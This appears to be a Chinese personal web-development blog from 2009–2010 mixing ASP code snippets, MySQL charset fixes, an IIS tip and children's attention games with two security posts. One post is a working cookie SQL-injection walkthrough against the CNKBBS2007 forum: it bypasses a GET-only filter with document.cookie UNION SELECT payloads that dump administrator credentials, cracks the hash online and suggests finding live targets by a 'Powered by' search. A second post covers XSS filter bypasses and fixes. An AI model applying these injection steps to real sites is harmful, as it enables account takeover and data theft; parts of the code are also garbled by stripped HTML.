小鱼潜水

asp防后退语句

2010-02-28T22:06:52+08:00

只这一句,放在页面的最上方,很有效.

引用内容

判断输入框里是否是中文的函数asp代码

2010-02-24T10:24:31+08:00

Function isChineseword(getStr) '判断是否为中文
isChineseword=False
  strLen=Len(getStr)
IF strLen=0 Then
isChineseword=False
Exit Function
Else
    For i=1 To strLen
IF Abs(Asc(Mid(getStr,i,1)))<127 Then
isChineseword=False
    Exit Function
    End IF
Next
    isChineseword=True
End IF
End Function

使用方法：isChineseword(email)=True 说明email是中文，反之为英文或数字

asp MYSQL出现问号乱码的解决方法

2010-02-23T15:48:57+08:00

这样的问题是因为
数据库字符集,表字符集,字段字符集都设为：gbk_chinese_ci

注意数据库连接串里面的 Stmt=Set Names 'GBK' ，一定要有这一句。

下面是asp链接mysql的代码。请注意，后面有个GBK。这样就是指定链接的编码类型。根据你使用的数据
库编码类型。修改成你自己的。
ConnectionString ="Driver={MySQL ODBC 3.51
Driver};Server=myserver;Database=mysql;User=myuser;password=mypassword;Option=3;Stmt=Set
Names 'GBK'"
如果使用高版本的mysql，经常出现这样的情况,中文经常为乱码；包括在php中。
参考的方法:

设置一下,mysql的字体.
在mysql.ini加入
[mysql]
default-character-set=gb2312
[client]
default-character-set=gb2312
[mysqld]
default-character-set=gb2312 //或gbk
注册改了后,在改之前的数据库没有效果的.这些数据库目录下的db.opt文件的内容改为
default-character-set=gb2312
default-collation=gb2312_chinese_ci
也可以这么做

dim driverName,chs
driverName="Driver={mysql odbc 3.51
driver};server=localhost;database=test;uid=loaer;pwd=123456;"
set conn=server.createobject("adodb.connection")
conn.open driverName

'查询之前先执行下面这一句
set chs=conn.Execute("SET NAMES 'gb2312'")
'查询数据库表
sql = "Select * FROM tb_commondata"
Set rs = conn.Execute(sql)

ASP提取内容里面的图片地址

2010-02-08T22:10:33+08:00

把下面的代码复制到asp文件里，试试。

 程序代码
<%   
 
          content=""
regstr=".?[./\w-:]+.(gif|jpg)"   
url=Replace(Replace(RegExp_Execute(regstr,content),"'",""),"""","")   
array_url=split(url,"|||")   
for   i=0   to   ubound(array_url)   
          Response.Write(array_url(i)&"
")   
fname=RegExp_Execute("w+.(jpg|gif)",array_url(i))   
Response.Write(Replace(fname,"|||",""))   
next   
 
    
    '返回匹配值   
    Function   RegExp_Execute(patrn,   strng)   
          Dim   regEx,   Match,   Matches,values   '建立变量。   
          Set   regEx   =   New   RegExp   '建立正则表达式。   
          regEx.Pattern   =   patrn   '设置模式。   
          regEx.IgnoreCase   =   true   '设置是否区分字符大小写。   
          regEx.Global   =   True   '设置全局可用性。   
          Set   Matches   =   regEx.Execute(strng)   '执行搜索。   
          For   Each   Match   in   Matches   '遍历匹配集合。   
                  values=values&Match.Value&"|||"   
          Next   
          RegExp_Execute   =   values   
    End   Function   
'取得图片内容   
function   getHTTPPage(url)   
      on   error   resume   next   
      dim   http   
      set   http=server.createobject("MSXML2.XMLHTTP")'使用xmlhttp的方法来获得图片的内容   
      Http.open   "GET",url,false   
      Http.send()   
      if   Http.readystate<>4   then     
      exit   function   
      end   if   
      getHTTPPage=Http.responseBody   
      set   http=nothing   
      if   err.number<>0   then   err.Clear     
end   function   
'保存图片   
function   saveimage(from,tofile)   
          On   Error   Resume   Next   
          dim   geturl,objStream,imgs   
          geturl=trim(from)   
          imgs=getHTTPPage(geturl)'取得图片的具休内容的过程   
          Set   objStream   =   Server.CreateObject("ADODB.Stream")'建立ADODB.Stream对象，必须要ADO   2.5以上版本   
          objStream.Type   =1'以二进制模式打开   
          objStream.Open   
          objstream.write   imgs'将字符串内容写入缓冲   
          objstream.SaveToFile   server.mappath(tofile),2'-将缓冲的内容写入文件   
          objstream.Close()'关闭对象   
          set   objstream=nothing   
end   function   
    
%>

Cookies的注入方法和原理

2010-02-03T09:31:52+08:00

　　现在很多网站都采用了通用防注入程序，那么对于这种网站，我门是否就束手无策了呢？答案是否定的，因为我们可以采用cookie 注入的方法，而很多通用防注入程序对这种注入方式都没有防备。

　　在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Request对象获取客户端提交数据常用的是GET和POST二种方式,同时request对象可以不通过集合来获得数据,即直接使用"request("name")"但它的效率低下,容易出错,当我们省略具体的集合名称时,ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.

　　我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5.0 "官方下载地址"http://www.cnetking.com/websys2.asp?id=26"发布时间是2007-06-06,打开系统的源代码后,在"user_RxMsg_detail.asp"文件中,有如下代码:

(调用opendb.asp文件)

<%
Call CheckUserLogin(username)
Dim action,s,id
id=request("id") (获取客户提交的变量,并赋值给id,并没过滤,也没有指定采用那种方式提交)
if id<>"" then Call IsNum(bid) (这是程序员的出现地方,注意bid<>id)
conn.execute("update cnk_Users_RxMsg set readed=1 where id="&id) ’设置已读
rs.open "select * from cnk_users_RxMsg where id="&id,conn,1,3

我们再打开"opendb.asp"文件

<%Option Explicit
Response.Buffer = true%>
(调用fzr.asp文件)

..................

以现它是连接数据库的文件,其中调用了fzr.asp文件,我们再打开fzr.asp文件

<%
’--------版权说明------------------
’SQL通用防注入程序
’Aseanleung
’--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
Dim fso1,all_tree2,file1,files,filez,fs1,zruserip
If Request.QueryString<>"" Then (对Request.QueryString提交(客户采用GET方式提交)的数据进行判断,并没有指明对其它方式提交的数据进行判断)
’自定义需要过滤的字串,用 "|" 分隔
Fy_In = "’|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script" (阻止了常用的SQL注入的语句)
Fy_Inf = split(Fy_In,"|")
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
zruserip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If zruserip="" Then zruserip=Request.ServerVariables("REMOTE_ADDR")
Response.Write "内容含有非法字符！请不要有’或and或or等字符，请去掉这些字符再发！！
"
Response.Write "如是要攻击网站，系统记录了你的操作↓
"
Response.Write "操作ＩＰ："&zruserip&"
"
Response.Write "操作时间："&Now&"
"
Response.Write "操作页面："&Request.ServerVariables("URL")&"
"
Response.Write "提交方式：ＧＥＴ
"
Response.Write "提交参数："&Fy_Get&"
"
Response.Write "提交数据："&Request.QueryString(Fy_Get)
......................
很明显的看出它是一个SQL通用防注入程序文件,(以上的红字是对代码的解释)

代码看好了,我们来整理下思路:由于程序员的出错,导致了id没有被过滤就被带到SQL语句中查询,这是注入漏洞产生的原因,虽然程序引入了防注入程序,阻止了常用的SQL语句使用,但只对客户采用GET方式提交的数据进行判断,而没有对其它方式提交的数据进行判断,这样导致了客户可以使用Request.cookie方式来提交变量的值,而绕过了SQL防注入程序(总结下:cookie注入产生的条件:系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量没有过滤,而且在防注入程序中没有限制Request.cookie,现在防注入程序3.0只是对客户采用GET和POST提交方式进行了限制).

原理讲好了,下面我们来学学coolie注入语句吧

cookies的注入语句:alert(document.cookie="id="+escape("这就是asp? id=xx后面xx代表的数值) and (这里是注入攻击代码)"));

这儿用到了javascript语言的知识,我把这语句的意思分解如下,以便大家理解:

1:"alert()"显示信息对话框的alert()方法,它生成的是一个独立的小窗口,称作对话框,用来显示一条信息和一个按钮.(我们在跨站中常用到)

2:"document.cookie"我们在处理cookie时,javascript将它保存为document对象的一个属性,其属性名称是cookie,利用这个属性,我们可以创建和读取cookie数据,在程序中可以使用:"alert(document.cookie)"调用当前页面的cookie数据项值.在我们启动浏览器打开页面后,如果存在相应的cookie,那么它被装入到document对象的cookie属性中,document.cookie属性采用name=value对应方式保存各个cookie数据项值.document(文档)对象表示在浏览器里显示的HTML(向页面输出数据),cookie属性是允许读写HTTP的cookie;字符串类型

4:escape()函数;它将字符串中所有的非字母字符转换为用字母数字表示的等价字符串,具有编码字符串的功能.一般情况下,cookie通常由服务器端的程序通过HTTP请求和响应头发送给浏览器,但是,利用javascript,可以在本地浏览器中设置cookie格式:name=value的属性是指定cookie数据项的名称,value是该名称对应的值,它是一个字符串,也可是由一系列字符组成,name和value中不能包含分号,逗号及空白,(50"and 1=1")有分号,逗号及空白,所以我们要用到escape()函数对他们进行编码

上面整句的意思大家都明白了吧,就是设置调用当前创建的cookie数据项值,在设置cookie时,它们首先保存在浏览器的内存中,退出浏览器时,才能被写入到硬盘中.(这就是在下面操作中为什么在退出后,再输入链接的地址原因)

最后我们来测试下,利用步骤:

1:打开在本地机子上架设的中网景论坛:注册一个用户,我们就会收到管理员发来的一条短信息,我们打开短信息的链接(注意这儿的参数id值)

2:把浏览器的URL清空,输入"alert(document.cookie="id="+escape("相应参数id值 and 1=1"));之后会弹出一个框框,

3:再次输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员(返回正常的页面,说明我们绕过了SQL防注入程序了)

3:再输入:alert(document.cookie="id="+escape("1 and 1=2"));然后再输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员(时间和内容都没有显示了,说明我们可以进行注入了)

4:通过查看系统数据库,得知cnk_users_RxMsg 表里有8个字段,Cnk_Admin表是存放管理员资料的,其中AdminName,AdminPassword字段分别对应的是账号和密码,我们使用联合查询语句,再输入:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,4,5,6,7,8 from Cnk_Admin"))然后把地址栏清空,输入http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp,可经看到显示了数字4和5

5:再次把地址栏清空,输入:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,AdminName,AdminPassword,6,7,8 from Cnk_Admin")),提交后,清空地址栏,输入:http://127.0.0.1/cnkbbs5.2_ac/user_RxMsg_detail.asp?username=论坛管理员,这样我们就在页面上看到管理员的密码和账号了

6:把得到的密码放入http://www.cmd5.com网站查询,得知管理员的明文密码是admin,在网站的首页我们就可进行登录后台了,我们也可利用关键字"Powered by CNKBBS2007 （5.2）"去网上找使用这系统的网站,(不过不是很多啊)大家去练习下手工的注入吧,可别搞在破坏哟!不过在使用这类注入时,它需要两次手动操作才能完成,这也是容易出错的地方,可要细心才行.

解决安装IIS时提示找不到zClientm.exe文件的问题

2010-01-29T14:51:20+08:00

常常重装系统，因为装XP系统，网站测试时需要装IIS，但每次从网上下载来的组件包安装时总提示找不到zClientm.exe文件，后来在网上查找资料时，看到原来是“游戏”的原因。

首要先搞清楚zClientm.exe是什么文件,上网搜了搜.得到的答案是:zClient.exe是微软Microsoft游戏中心程序，用于使你在线玩游戏。

在Windows组件安装栏里有附件和工具.在组件安装向导中顺着[附件和工具]--[游戏]，把这[游戏]前的选择框里的那个勾去掉,然后再安装IIS,成功安装,问题解决!

培养注意力的游戏

2010-01-25T14:32:08+08:00

注意力不集中，易分心，是很多孩子具有的特点。年龄越小，控制注意力的时间越短，小学一年级的学生一次集中注意力时间至多也只有15分钟。这是由于孩子的神经系统发育还不够完善处在发育当中，注意力不集中这种情况将随着年龄的增长渐好转。而小学要求学生上课要坐40分钟，然而我们并不能被动地等待孩子的自我发育的完善，否则将影响学习效率及学习成绩。因此，对于注意力不易集中的孩子，可进行一定的具体训练，以提高注意力，适应课堂生活。有的孩子因为注意力的分配原因，经常会有抄错数字，写错字等等的情况，有时候家长和老师会责怪孩子粗心，其实，有的时候确实是因为他的注意力无法集中所造成的。所以在家里和学校，家长和老师可以适当的用一些小游戏，训练孩子的注意力，提高学习的效率。

1、玩扑克游戏。可锻炼注意力高度集中和快速反应能力。

取三张不同的牌（去掉花牌），随意排列于桌上，如从左到右依次是梅花2，黑桃3，方块5、选取一张要记住的牌，如梅花2，让她盯住这张牌，然后把三张牌倒扣在桌上，由家长随意更换三张牌的位置，然后，让她报出梅花2在哪儿。如她说猜对了，就胜，两人轮换做游戏。随着能力的提高，家长可以增加难度，如增加牌的数量，变换牌的位置的次数和提高变换牌位置的。

2、萝卜蹲。可以训练注意力的敏捷性。

将孩子分成人数相等的三组，一组代表红萝卜，一组代表白萝卜，一组代表黄萝卜。老师喊口令：“红萝卜蹲，黄萝卜蹲，白萝卜不蹲。”喊哪一组蹲，哪一组要快速蹲下。喊另一组，前一组的孩子要快速站起。未按口令动作的孩子算失败。（也可以由孩子来发令）

3、大小西瓜。可破除思维的定式和思维惯性。

小朋友站成圈。老师指定一个孩子当排头，说“大西瓜”，但两手比成小西瓜的样子；接着第二个孩子说：“小西瓜”，但两手比成大西瓜的样子，依次直到最后一人。

4、反口令游戏。可破除思维的定式和思维惯性。

老师说一个口令，学生按照发口令做动作。例如说：向前一步走，那学生就做向后一步退。

5、圈字游戏，可训练视觉的注意力。

很多很多的数的数表，然后让学生把下列数字7全部打圈。例如：
359156936982452365023665253622602369500
907472002582058205820581242563514252123
......

6、摸纽扣。可训练触觉注意力。

找一堆二眼和四眼的纽扣，让孩子蒙上眼睛将纽扣分分类，可以让他们在触摸纽扣的同时，训练注意力。

还有许多体育活动需要孩子高度集中注意力才能完成，如，走平衡木、打乒乓球、跳绳等。让孩子多参加这类活动，能够促进他们神经系统的成熟和控制能力的发展，从而提高注意力。当然，这些活动必须简单短小、富有趣味，才能吸引孩子的参与，从而达到训练的目的。

网页上下拉菜单穿过弹出层的解决办法

2010-01-21T11:33:48+08:00

其实文不对题，但今天上午为了解决网页上下拉菜单穿过弹出层的问题费了不少周折，最后锁定这个函数有效，在弹出层后，用下面的函数来隐藏下拉菜单，取得较好的效果。
记录于此，免以后用到。

 程序代码

function hiddtips(divid){
  if(document.getElementById(divid).style.display=="none"){
    document.getElementById(divid).style.display="";
  }
  else{
    document.getElementById(divid).style.display="none";
  }
}

也谈跨站脚本攻击与防御

2010-01-19T10:21:50+08:00

网络上曾经有过关于跨站脚本攻击与防御的文章，但是随着攻击技术的进步，以前的关于跨站脚本攻击的看法与理论已经不能满足现在的攻击与防御的需要了，而且由于这种对于跨站脚本认识上的混乱，导致现在很多的程序包括现在的动网都存在着跨站脚本过滤不严的问题，希望本文能给写程序的与研究程序的带来一点思路。
    还是首先看看跨站脚本漏洞的成因，所谓跨站脚本漏洞其实就是Html的注入问题，恶意用户的输入没有经过严格的控制进入了数据库最终显示给来访的用户，导致可以在来访用户的浏览器里以浏览用户的身份执行HTml代码，数据流程如下：

恶意用户的Html输入————>web程序————>进入数据库————>web程序————>用户浏览器

这样我们就可以清楚的看到Html代码是如何进入受害者浏览器的了，我们也就可以根据这个流程来讨论跨站脚本的攻击与防御了！
    1 什么是HTml输入？

    这里给出一个HTml代码的示例

http://www.loveshell.jpg" width=100 onerror=alert("载入图片错误!")>

很多的程序最终都是将用户的输入转换成这种形式的。可以看到<>是告诉浏览器这是一个Html标记，img是这个Html标记的名称，src是这个标记的第一个属性，=后面是这个属性的值，后面的width是第二个属性，onerror是标记的事件属性。大家可以看到，一个Html标记是包括很多元素的，并不是传统意义上的只有输入<>才会注入Html，事实上只要你的输入处在Html标签内，产生了新的元素或者属性，就实现了跨站脚本攻击！实际上大多数隐秘的跨站脚本攻击是不需要<>的，因为现在的Ubb标签已经让你处在了Html标记之内，很有意思，不是么？

    2 哪里才是罪恶的来源？

    既然我们的目标是引入代码在目标用户的浏览器内执行，那么我们来看看哪些地方可以引入HTml代码吧！如果用户可以不受限制的引入<>，那么很显然他可以完全操纵一个Html标记，譬如这样的形式，这对于追求安全的程序来说是绝对不允许的，所以首先要做转换的就是<>，通过如下代码：

过滤代码：
replace(str,"<","<")
replace(str,">",">")
    好了，用户可能不能构造自己的HTml标记了，那么利用已经存在的属性如何呢？下面的代码依然可以工作得很好：

因为很多的Html标记里属性都支持javascript:[code]的形式，很好，很多的程序意识到了这一点，可能做了如下的转换：

过滤代码
Dim re
    Set re=new RegExp
    re.IgnoreCase =True
    re.Global=True
re.Pattern="javascript:"
    Str = re.replace(Str,"javascript：")
    re.Pattern="jscript:"
   Str = re.replace(Str,"jscript：")
    re.Pattern="vbscript:"
   Str = re.replace(Str,"vbscript：")
set re=nothing

你看，只要发现以javascript等脚本属性的形式都会被过滤掉，失去了:的脚本代码是起不了作用的！这样完美了么？事实上Html属性的值，注意是值而不是属性本身是支持&#ASCii这种形式表示的，譬如上面的代码可以换成这样：

代码又执行了，呵呵！看来你漏掉了点什么哦，加上这个代码吧！

replace(str,"&","&")

行了，&失去它原来的意义了，用户不能以其他方式表示Html属性值了哦！等等，这样的过滤真可以相信么？只要发现这种过滤的关键字机制，饶过就是简单的问题了：

没有javascript关键字了哦！注意中间那个是tab键弄出来的！关键字被拆分了哦！这是个很麻烦的问题，很多人忘记了这些特殊的字符，呵呵！有人想到要过滤空格了，在过滤之前我们再看看其他的一些东西吧！也许我们现在所处的src属性已经无法利用了，但是我们依然可以产生自己的属性或者事件机制哦！依然是可以执行Html代码的，首先说说事件机制吧：

这样依然可以执行代码的哦！明白问题出在哪了，不是么？有的程序员仿佛明白了，注意我说的是仿佛，动网就是一个典型的例子，事件属性不是要onerror么？很多人开始用正则表达式了，发现关键的词如onerror就会做转换或者提示用户不执行，是不是没有机会了呢？
    当然不是的，事件只是让代码运行的一种方法而不是所有的，可以定义事件了那么也就可以实现自己弄出自己的属性了，试试下面的：

呵呵，还是执行了哦！在做关键字过滤之后有人发现是不是属性之间分隔要用到空格，好，他们把空格堵死了（这样认为的人很多，呵呵）！将空格转成是个很普遍的方法？是么？甚至还可以让别人无法关键字拆分，不要太自信了，试试下面的代码看看如何：

嘿嘿，Good Work!这好象是利用了脚本里注释会被当作一个空白来表示造成的！那怎么办呢？上面提到的好象一直都是在进行被动的攻击防御，为什么不抓住他的本源出来呢？哪里出了问题哪里堵上！
    上面的问题好象本质上就是一个东西，那就是用户超越了他所处的标签，也就是数据和代码的混淆，对付这种混淆的办法就是限制监牢，让用户在一个安全的空间内活动，这通过上面的分析大家也可能已经知道，只要在过滤了<>这两个人人都会去杀的字符之后就可以把用户的输入在输出的时候放到""之间，现在的一般的程序都是这样做的，譬如将会转化成http://www.loveshell.net">这是个好的安全习惯，然后呢？就要让用户的输入处在安全的领域里了，这可以通过过滤用户输入里""实现，但是不要忘记了，这个标签本身也是不安全的，过滤掉空格和tab键就不用担心关键字被拆分饶过了，然后就是用文章中提到的办法过滤掉script关键字，最后就是防止用户通过&#这样的形式饶过检查，转换掉&吧！
    在文章中开始提到的图里可以看到，数据的转换和过滤是可以在3个地方进行转换的，在接受数据的时候可以转换下，在进入数据库的时候可以转换下，在输出数据的时候也可以转换下，但是困惑在哪里呢？不得不面对一个问题就是许多时候程序员舍不得为安全做出那么大的应用上的牺牲，安全是要有代价的，譬如现在邮箱的就不愿意舍弃html标签，所以他们侧重于XSS的IDS检测的性质，只要发现不安全的东西就会转化，但是攻击是无法预知的，漂亮的东西总是脆弱的，有限制，肯定就有人会饶过，呵呵。本文没什么技术含量，只是希望搞安全的脚本人员能更加的了解Xss，跨站，不是那么简单滴！

asp获取客户的IP和访问时间，并生成txt文件

2009-09-24T10:10:23+08:00

<% '获取客户的IP和访问时间
dim t,d,str
t=time()
d=date()
str=d&" "&t
set myfileobject=server.CreateObject("scripting.filesystemobject")
set appnedtextfile=myfileobject.opentextfile(server.MapPath("getIP.txt"),8,true)
appnedtextfile.writeline("IP:"&request.ServerVariables("remote_host")&" 访问时间: "&str)
appnedtextfile.close
%>